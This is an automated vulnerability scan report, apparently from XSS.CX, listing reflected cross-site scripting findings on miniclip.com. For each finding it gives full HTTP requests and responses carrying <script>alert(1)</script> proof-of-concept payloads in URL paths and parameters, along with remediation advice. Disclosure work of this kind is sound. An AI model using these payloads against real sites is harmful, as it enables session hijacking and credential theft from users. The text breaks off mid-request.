XSS, Reflected Cross Site Scripting, CWE-79, CAPEC-86, DORK, GHDB, miniclip.com Report generated by XSS.CX at Wed Jul 20 06:56:54 CDT 2011.
Public Domain Vulnerability Information, Security Articles, Vulnerability Reports, GHDB, DORK Search
XSS Home | XSS Crawler | SQLi Crawler | HTTPi Crawler | FI Crawler |
Loading
1. Cross-site scripting (reflected)
1.1. http://www.miniclip.com/images/awards/resize.php [REST URL parameter 1]
1.2. http://www.miniclip.com/images/awards/resize.php [REST URL parameter 2]
1.3. http://www.miniclip.com/images/awards/resize.php [REST URL parameter 3]
1.4. http://www.miniclip.com/images/flags/resize.php [REST URL parameter 1]
1.5. http://www.miniclip.com/images/flags/resize.php [REST URL parameter 2]
1.6. http://www.miniclip.com/images/flags/resize.php [REST URL parameter 3]
1.7. http://www.miniclip.com/images/flags/resize.php [i parameter]
1.8. http://www.miniclip.com/php/services/indigo/p.php [REST URL parameter 1]
1.9. http://www.miniclip.com/php/services/indigo/p.php [REST URL parameter 2]
1.10. http://www.miniclip.com/php/services/indigo/p.php [REST URL parameter 3]
1.11. http://www.miniclip.com/php/services/indigo/p.php [REST URL parameter 4]
1.12. http://www.miniclip.com/players/en/resize.php [REST URL parameter 1]
1.13. http://www.miniclip.com/players/en/resize.php [REST URL parameter 2]
1.14. http://www.miniclip.com/players/en/resize.php [REST URL parameter 3]
1.15. http://www.miniclip.com/scripts/adserver/serve.php [REST URL parameter 1]
1.16. http://www.miniclip.com/scripts/js.php [REST URL parameter 1]
1.17. http://www.miniclip.com/scripts/js.php [f parameter]
1.18. http://www.miniclip.com/sketch-star/ss-lib/ajax.php [REST URL parameter 1]
1.19. http://www.miniclip.com/sketch-star/ss-lib/ajax.php [REST URL parameter 2]
1.20. http://www.miniclip.com/sketch-star/ss-lib/ajax.php [REST URL parameter 3]
1.21. http://www.miniclip.com/sketch-star/ss-lib/ajax.php [action parameter]
1.22. http://www.miniclip.com/sketch-star/ss-lib/ajax.php [name of an arbitrarily supplied request parameter]
1.23. http://www.miniclip.com/sketch-star/ss-lib/thumb.php [REST URL parameter 1]
1.24. http://www.miniclip.com/sketch-star/ss-lib/thumb.php [REST URL parameter 2]
1.25. http://www.miniclip.com/sketch-star/ss-lib/thumb.php [REST URL parameter 3]
1.26. http://www.miniclip.com/styles/css.php [REST URL parameter 1]
1.27. http://www.miniclip.com/styles/css.php [REST URL parameter 2]
1.28. http://www.miniclip.com/games/american-football/en/ [ipLocation cookie]
1.29. http://www.miniclip.com/games/american-football/en/ [ipLocation cookie]
1.30. http://www.miniclip.com/games/american-football/en/ [ipLocation cookie]
1.31. http://www.miniclip.com/games/en/ [ipLocation cookie]
1.32. http://www.miniclip.com/games/en/ [ipLocation cookie]
2. Cookie without HttpOnly flag set
2.1. http://www.miniclip.com/php/services/indigo/p.php
2.2. http://www.miniclip.com/games/american-football/en/
2.3. http://www.miniclip.com/games/en/
3. Cookie scoped to parent domain
3.1. http://www.miniclip.com/games/american-football/en/
3.2. http://www.miniclip.com/games/en/
4. Cross-domain Referer leakage
5. Cross-domain script include
5.1. http://www.miniclip.com/games/american-football/en/
5.2. http://www.miniclip.com/games/en/
6. Email addresses disclosed
6.1. http://www.miniclip.com/scripts/sketchstar/controls.js
6.2. http://www.miniclip.com/scripts/sketchstar/dragdrop.js
7. Content type incorrectly stated
7.1. http://www.miniclip.com/facebook/facebook.js
7.2. http://www.miniclip.com/favicon.ico
7.3. http://www.miniclip.com/images/icon_c_and.png
7.4. http://www.miniclip.com/php/services/notification.php
1. Cross-site scripting (reflected)
next
There are 32 instances of this issue:
Issue background
Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application. The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes. Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method). The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.
Issue remediation
In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defences:Input should be validated as strictly as possible on arrival, given the kind of content which it is expected to contain. For example, personal names should consist of alphabetical and a small range of typographical characters, and be relatively short; a year of birth should consist of exactly four numerals; email addresses should match a well-defined regular expression. Input which fails the validation should be rejected, not sanitised. User input should be HTML-encoded at any point where it is copied into application responses. All HTML metacharacters, including < > " ' and =, should be replaced with the corresponding HTML entities (< > etc). In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.
1.1. http://www.miniclip.com/images/awards/resize.php [REST URL parameter 1]
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.miniclip.com
Path:
/images/awards/resize.php
Issue detail
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 89a39"><script>alert(1)</script>fbce0886c00 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /images89a39"><script>alert(1)</script>fbce0886c00 /awards/resize.php?i=591&w=50&h=50 HTTP/1.1 Host: www.miniclip.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: image/png,image/*;q=0.8,*/*;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://www.miniclip.com/games/american-football/en/ Cookie: ipLocation=US; language=en; PHPSESSID=2761004272941268992-1915725707-3144267629514981376; ad_is_enabled-position2:homepage=true; ad_is_enabled-showcase:homepage=false; ad_is_enabled-supershowcase:homepage=false; adserver_last_id_4=2893; __utma=1.467551314.1311162209.1311162209.1311162209.1; __utmb=1.2.10.1311162209; __utmc=1; __utmz=1.1311162209.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; OAX=rcHW804mv1oADuWf; scorecardresearch=1848069558-205830962-1311162223126; adserver_last_id_3=2297; __utma=1.467551314.1311162209.1311162209.1311162209.1; __utmb=1.3.10.1311162209; __utmc=1; __utmz=1.1311162209.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; __qca=P0-1550842470-1311162245817; ad_is_enabled-position2:gamepage=true; ad_is_enabled-showcase:gamepage=false; ad_is_enabled-supershowcase:gamepage=false
Response
HTTP/1.1 404 Not Found Date: Wed, 20 Jul 2011 11:53:06 GMT Server: Apache/2.2.3 (CentOS) DAV/2 mod_python/3.2.8 Python/2.4.3 mod_ssl/2.2.3 OpenSSL/0.9.8e-fips-rhel5 mod_perl/2.0.4 Perl/v5.8.8 Set-Cookie: language=en; expires=Mon, 25-Jul-2011 11:53:06 GMT; path=/; domain=.miniclip.com Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: ad_is_enabled-position2:homepage=true; expires=Wed, 20-Jul-2011 11:58:06 GMT; path=/; domain=.miniclip.com Set-Cookie: ad_is_enabled-showcase:homepage=false; expires=Wed, 20-Jul-2011 11:58:06 GMT; path=/; domain=.miniclip.com Set-Cookie: ad_is_enabled-supershowcase:homepage=false; expires=Wed, 20-Jul-2011 11:58:06 GMT; path=/; domain=.miniclip.com Content-Type: text/html; charset=UTF-8 Content-Length: 82607 <!doctype html> <html lang="en" xmlns:og="http://ogp.me/ns#" xmlns:fb="http://www.facebook.com/2008/fbml"> <head> <!-- s --> <meta charset="utf-8"> <title>Error 404 - Games at Miniclip.com - ...[SNIP]... <link rel="canonical" href="http://www.miniclip.com/images89a39"><script>alert(1)</script>fbce0886c00 /awards/resize.php" />...[SNIP]...
1.2. http://www.miniclip.com/images/awards/resize.php [REST URL parameter 2]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.miniclip.com
Path:
/images/awards/resize.php
Issue detail
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dc16e"><script>alert(1)</script>8173bffb6d3 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /images/awardsdc16e"><script>alert(1)</script>8173bffb6d3 /resize.php?i=591&w=50&h=50 HTTP/1.1 Host: www.miniclip.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: image/png,image/*;q=0.8,*/*;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://www.miniclip.com/games/american-football/en/ Cookie: ipLocation=US; language=en; PHPSESSID=2761004272941268992-1915725707-3144267629514981376; ad_is_enabled-position2:homepage=true; ad_is_enabled-showcase:homepage=false; ad_is_enabled-supershowcase:homepage=false; adserver_last_id_4=2893; __utma=1.467551314.1311162209.1311162209.1311162209.1; __utmb=1.2.10.1311162209; __utmc=1; __utmz=1.1311162209.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; OAX=rcHW804mv1oADuWf; scorecardresearch=1848069558-205830962-1311162223126; adserver_last_id_3=2297; __utma=1.467551314.1311162209.1311162209.1311162209.1; __utmb=1.3.10.1311162209; __utmc=1; __utmz=1.1311162209.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; __qca=P0-1550842470-1311162245817; ad_is_enabled-position2:gamepage=true; ad_is_enabled-showcase:gamepage=false; ad_is_enabled-supershowcase:gamepage=false
Response
HTTP/1.1 404 Not Found Date: Wed, 20 Jul 2011 11:53:13 GMT Server: Apache/2.2.3 (CentOS) DAV/2 mod_python/3.2.8 Python/2.4.3 mod_ssl/2.2.3 OpenSSL/0.9.8e-fips-rhel5 mod_perl/2.0.4 Perl/v5.8.8 Set-Cookie: language=en; expires=Mon, 25-Jul-2011 11:53:13 GMT; path=/; domain=.miniclip.com Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: ad_is_enabled-position2:homepage=true; expires=Wed, 20-Jul-2011 11:58:13 GMT; path=/; domain=.miniclip.com Set-Cookie: ad_is_enabled-showcase:homepage=false; expires=Wed, 20-Jul-2011 11:58:13 GMT; path=/; domain=.miniclip.com Set-Cookie: ad_is_enabled-supershowcase:homepage=false; expires=Wed, 20-Jul-2011 11:58:13 GMT; path=/; domain=.miniclip.com Content-Type: text/html; charset=UTF-8 Content-Length: 82613 <!doctype html> <html lang="en" xmlns:og="http://ogp.me/ns#" xmlns:fb="http://www.facebook.com/2008/fbml"> <head> <!-- m --> <meta charset="utf-8"> <title>Error 404 - Games at Miniclip.com - ...[SNIP]... <link rel="canonical" href="http://www.miniclip.com/images/awardsdc16e"><script>alert(1)</script>8173bffb6d3 /resize.php" />...[SNIP]...
1.3. http://www.miniclip.com/images/awards/resize.php [REST URL parameter 3]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.miniclip.com
Path:
/images/awards/resize.php
Issue detail
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1a0a2"><script>alert(1)</script>be1c83b07c0 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /images/awards/resize.php1a0a2"><script>alert(1)</script>be1c83b07c0 ?i=591&w=50&h=50 HTTP/1.1 Host: www.miniclip.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: image/png,image/*;q=0.8,*/*;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://www.miniclip.com/games/american-football/en/ Cookie: ipLocation=US; language=en; PHPSESSID=2761004272941268992-1915725707-3144267629514981376; ad_is_enabled-position2:homepage=true; ad_is_enabled-showcase:homepage=false; ad_is_enabled-supershowcase:homepage=false; adserver_last_id_4=2893; __utma=1.467551314.1311162209.1311162209.1311162209.1; __utmb=1.2.10.1311162209; __utmc=1; __utmz=1.1311162209.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; OAX=rcHW804mv1oADuWf; scorecardresearch=1848069558-205830962-1311162223126; adserver_last_id_3=2297; __utma=1.467551314.1311162209.1311162209.1311162209.1; __utmb=1.3.10.1311162209; __utmc=1; __utmz=1.1311162209.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; __qca=P0-1550842470-1311162245817; ad_is_enabled-position2:gamepage=true; ad_is_enabled-showcase:gamepage=false; ad_is_enabled-supershowcase:gamepage=false
Response
HTTP/1.1 404 Not Found Date: Wed, 20 Jul 2011 11:53:20 GMT Server: Apache/2.2.3 (CentOS) DAV/2 mod_python/3.2.8 Python/2.4.3 mod_ssl/2.2.3 OpenSSL/0.9.8e-fips-rhel5 mod_perl/2.0.4 Perl/v5.8.8 Set-Cookie: language=en; expires=Mon, 25-Jul-2011 11:53:20 GMT; path=/; domain=.miniclip.com Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: ad_is_enabled-position2:homepage=true; expires=Wed, 20-Jul-2011 11:58:20 GMT; path=/; domain=.miniclip.com Set-Cookie: ad_is_enabled-showcase:homepage=false; expires=Wed, 20-Jul-2011 11:58:20 GMT; path=/; domain=.miniclip.com Set-Cookie: ad_is_enabled-supershowcase:homepage=false; expires=Wed, 20-Jul-2011 11:58:20 GMT; path=/; domain=.miniclip.com Content-Type: text/html; charset=UTF-8 Content-Length: 82608 <!doctype html> <html lang="en" xmlns:og="http://ogp.me/ns#" xmlns:fb="http://www.facebook.com/2008/fbml"> <head> <!-- s --> <meta charset="utf-8"> <title>Error 404 - Games at Miniclip.com - ...[SNIP]... <link rel="canonical" href="http://www.miniclip.com/images/awards/resize.php1a0a2"><script>alert(1)</script>be1c83b07c0 " />...[SNIP]...
1.4. http://www.miniclip.com/images/flags/resize.php [REST URL parameter 1]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.miniclip.com
Path:
/images/flags/resize.php
Issue detail
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e809c"><script>alert(1)</script>50b50af3c7e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /imagese809c"><script>alert(1)</script>50b50af3c7e /flags/resize.php?i=EN&w=29&h=20&c=1 HTTP/1.1 Host: www.miniclip.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: image/png,image/*;q=0.8,*/*;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://www.miniclip.com/games/en/ Cookie: ipLocation=US; language=en; PHPSESSID=2761004272941268992-1915725707-3144267629514981376; ad_is_enabled-position2:homepage=true; ad_is_enabled-showcase:homepage=false; ad_is_enabled-supershowcase:homepage=false
Response
HTTP/1.1 404 Not Found Date: Wed, 20 Jul 2011 11:46:46 GMT Server: Apache/2.2.3 (CentOS) DAV/2 mod_python/3.2.8 Python/2.4.3 mod_ssl/2.2.3 OpenSSL/0.9.8e-fips-rhel5 mod_perl/2.0.4 Perl/v5.8.8 Set-Cookie: language=en; expires=Mon, 25-Jul-2011 11:46:46 GMT; path=/; domain=.miniclip.com Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: ad_is_enabled-position2:homepage=true; expires=Wed, 20-Jul-2011 11:51:46 GMT; path=/; domain=.miniclip.com Set-Cookie: ad_is_enabled-showcase:homepage=false; expires=Wed, 20-Jul-2011 11:51:46 GMT; path=/; domain=.miniclip.com Set-Cookie: ad_is_enabled-supershowcase:homepage=false; expires=Wed, 20-Jul-2011 11:51:46 GMT; path=/; domain=.miniclip.com Content-Type: text/html; charset=UTF-8 Content-Length: 82523 <!doctype html> <html lang="en" xmlns:og="http://ogp.me/ns#" xmlns:fb="http://www.facebook.com/2008/fbml"> <head> <!-- s --> <meta charset="utf-8"> <title>Error 404 - Games at Miniclip.com - ...[SNIP]... <link rel="canonical" href="http://www.miniclip.com/imagese809c"><script>alert(1)</script>50b50af3c7e /flags/resize.php" />...[SNIP]...
1.5. http://www.miniclip.com/images/flags/resize.php [REST URL parameter 2]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.miniclip.com
Path:
/images/flags/resize.php
Issue detail
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2830a"><script>alert(1)</script>1f789d33f9e was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /images/flags2830a"><script>alert(1)</script>1f789d33f9e /resize.php?i=EN&w=29&h=20&c=1 HTTP/1.1 Host: www.miniclip.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: image/png,image/*;q=0.8,*/*;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://www.miniclip.com/games/en/ Cookie: ipLocation=US; language=en; PHPSESSID=2761004272941268992-1915725707-3144267629514981376; ad_is_enabled-position2:homepage=true; ad_is_enabled-showcase:homepage=false; ad_is_enabled-supershowcase:homepage=false
Response
HTTP/1.1 404 Not Found Date: Wed, 20 Jul 2011 11:46:53 GMT Server: Apache/2.2.3 (CentOS) DAV/2 mod_python/3.2.8 Python/2.4.3 mod_ssl/2.2.3 OpenSSL/0.9.8e-fips-rhel5 mod_perl/2.0.4 Perl/v5.8.8 Set-Cookie: language=en; expires=Mon, 25-Jul-2011 11:46:53 GMT; path=/; domain=.miniclip.com Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: ad_is_enabled-position2:homepage=true; expires=Wed, 20-Jul-2011 11:51:53 GMT; path=/; domain=.miniclip.com Set-Cookie: ad_is_enabled-showcase:homepage=false; expires=Wed, 20-Jul-2011 11:51:53 GMT; path=/; domain=.miniclip.com Set-Cookie: ad_is_enabled-supershowcase:homepage=false; expires=Wed, 20-Jul-2011 11:51:54 GMT; path=/; domain=.miniclip.com Content-Type: text/html; charset=UTF-8 Content-Length: 82518 <!doctype html> <html lang="en" xmlns:og="http://ogp.me/ns#" xmlns:fb="http://www.facebook.com/2008/fbml"> <head> <!-- s --> <meta charset="utf-8"> <title>Error 404 - Games at Miniclip.com - ...[SNIP]... <link rel="canonical" href="http://www.miniclip.com/images/flags2830a"><script>alert(1)</script>1f789d33f9e /resize.php" />...[SNIP]...
1.6. http://www.miniclip.com/images/flags/resize.php [REST URL parameter 3]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.miniclip.com
Path:
/images/flags/resize.php
Issue detail
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 64fdf"><script>alert(1)</script>abbb9f71cd3 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /images/flags/resize.php64fdf"><script>alert(1)</script>abbb9f71cd3 ?i=EN&w=29&h=20&c=1 HTTP/1.1 Host: www.miniclip.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: image/png,image/*;q=0.8,*/*;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://www.miniclip.com/games/en/ Cookie: ipLocation=US; language=en; PHPSESSID=2761004272941268992-1915725707-3144267629514981376; ad_is_enabled-position2:homepage=true; ad_is_enabled-showcase:homepage=false; ad_is_enabled-supershowcase:homepage=false
Response
HTTP/1.1 404 Not Found Date: Wed, 20 Jul 2011 11:47:03 GMT Server: Apache/2.2.3 (CentOS) DAV/2 mod_python/3.2.8 Python/2.4.3 mod_ssl/2.2.3 OpenSSL/0.9.8e-fips-rhel5 mod_perl/2.0.4 Perl/v5.8.8 Set-Cookie: language=en; expires=Mon, 25-Jul-2011 11:47:03 GMT; path=/; domain=.miniclip.com Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: ad_is_enabled-position2:homepage=true; expires=Wed, 20-Jul-2011 11:52:03 GMT; path=/; domain=.miniclip.com Set-Cookie: ad_is_enabled-showcase:homepage=false; expires=Wed, 20-Jul-2011 11:52:03 GMT; path=/; domain=.miniclip.com Set-Cookie: ad_is_enabled-supershowcase:homepage=false; expires=Wed, 20-Jul-2011 11:52:03 GMT; path=/; domain=.miniclip.com Content-Type: text/html; charset=UTF-8 Content-Length: 82521 <!doctype html> <html lang="en" xmlns:og="http://ogp.me/ns#" xmlns:fb="http://www.facebook.com/2008/fbml"> <head> <!-- s --> <meta charset="utf-8"> <title>Error 404 - Games at Miniclip.com - ...[SNIP]... <link rel="canonical" href="http://www.miniclip.com/images/flags/resize.php64fdf"><script>alert(1)</script>abbb9f71cd3 " />...[SNIP]...
1.7. http://www.miniclip.com/images/flags/resize.php [i parameter]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.miniclip.com
Path:
/images/flags/resize.php
Issue detail
The value of the i request parameter is copied into the HTML document as plain text between tags. The payload 2d365<script>alert(1)</script>1c28127b8df was submitted in the i parameter. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /images/flags/resize.php?i=EN2d365<script>alert(1)</script>1c28127b8df &w=29&h=20&c=1 HTTP/1.1 Host: www.miniclip.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: image/png,image/*;q=0.8,*/*;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://www.miniclip.com/games/en/ Cookie: ipLocation=US; language=en; PHPSESSID=2761004272941268992-1915725707-3144267629514981376; ad_is_enabled-position2:homepage=true; ad_is_enabled-showcase:homepage=false; ad_is_enabled-supershowcase:homepage=false
Response
HTTP/1.1 200 OK Date: Wed, 20 Jul 2011 11:44:06 GMT Server: Apache/2.2.3 (CentOS) DAV/2 mod_python/3.2.8 Python/2.4.3 mod_ssl/2.2.3 OpenSSL/0.9.8e-fips-rhel5 mod_perl/2.0.4 Perl/v5.8.8 Content-Length: 84 Content-Type: text/html; charset=UTF-8 Award ID <strong>EN2D365<SCRIPT>ALERT(1)</SCRIPT>1C28127B8DF </strong> does not exist
1.8. http://www.miniclip.com/php/services/indigo/p.php [REST URL parameter 1]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.miniclip.com
Path:
/php/services/indigo/p.php
Issue detail
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 58b0c"><script>alert(1)</script>d47d0319be7 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /php58b0c"><script>alert(1)</script>d47d0319be7 /services/indigo/p.php?c=page_visited&url=http://www.miniclip.com/games/en/&t=1311162223155&ad_channel=1 HTTP/1.1 Host: www.miniclip.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: image/png,image/*;q=0.8,*/*;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://www.miniclip.com/games/en/ Cookie: ipLocation=US; language=en; PHPSESSID=2761004272941268992-1915725707-3144267629514981376; ad_is_enabled-position2:homepage=true; ad_is_enabled-showcase:homepage=false; ad_is_enabled-supershowcase:homepage=false; adserver_last_id_4=2299; __utma=1.467551314.1311162209.1311162209.1311162209.1; __utmb=1.1.10.1311162209; __utmc=1; __utmz=1.1311162209.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; OAX=rcHW804mv1oADuWf; scorecardresearch=1848069558-205830962-1311162223126
Response
HTTP/1.1 404 Not Found Date: Wed, 20 Jul 2011 11:48:06 GMT Server: Apache/2.2.3 (CentOS) DAV/2 mod_python/3.2.8 Python/2.4.3 mod_ssl/2.2.3 OpenSSL/0.9.8e-fips-rhel5 mod_perl/2.0.4 Perl/v5.8.8 Set-Cookie: language=en; expires=Mon, 25-Jul-2011 11:48:06 GMT; path=/; domain=.miniclip.com Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: ad_is_enabled-position2:homepage=true; expires=Wed, 20-Jul-2011 11:53:06 GMT; path=/; domain=.miniclip.com Set-Cookie: ad_is_enabled-showcase:homepage=false; expires=Wed, 20-Jul-2011 11:53:06 GMT; path=/; domain=.miniclip.com Set-Cookie: ad_is_enabled-supershowcase:homepage=false; expires=Wed, 20-Jul-2011 11:53:06 GMT; path=/; domain=.miniclip.com Content-Type: text/html; charset=UTF-8 Content-Length: 82612 <!doctype html> <html lang="en" xmlns:og="http://ogp.me/ns#" xmlns:fb="http://www.facebook.com/2008/fbml"> <head> <!-- m --> <meta charset="utf-8"> <title>Error 404 - Games at Miniclip.com - ...[SNIP]... <link rel="canonical" href="http://www.miniclip.com/php58b0c"><script>alert(1)</script>d47d0319be7 /services/indigo/p.php" />...[SNIP]...
1.9. http://www.miniclip.com/php/services/indigo/p.php [REST URL parameter 2]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.miniclip.com
Path:
/php/services/indigo/p.php
Issue detail
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c0fcf"><script>alert(1)</script>dea8c6ce7db was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /php/servicesc0fcf"><script>alert(1)</script>dea8c6ce7db /indigo/p.php?c=page_visited&url=http://www.miniclip.com/games/en/&t=1311162223155&ad_channel=1 HTTP/1.1 Host: www.miniclip.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: image/png,image/*;q=0.8,*/*;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://www.miniclip.com/games/en/ Cookie: ipLocation=US; language=en; PHPSESSID=2761004272941268992-1915725707-3144267629514981376; ad_is_enabled-position2:homepage=true; ad_is_enabled-showcase:homepage=false; ad_is_enabled-supershowcase:homepage=false; adserver_last_id_4=2299; __utma=1.467551314.1311162209.1311162209.1311162209.1; __utmb=1.1.10.1311162209; __utmc=1; __utmz=1.1311162209.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; OAX=rcHW804mv1oADuWf; 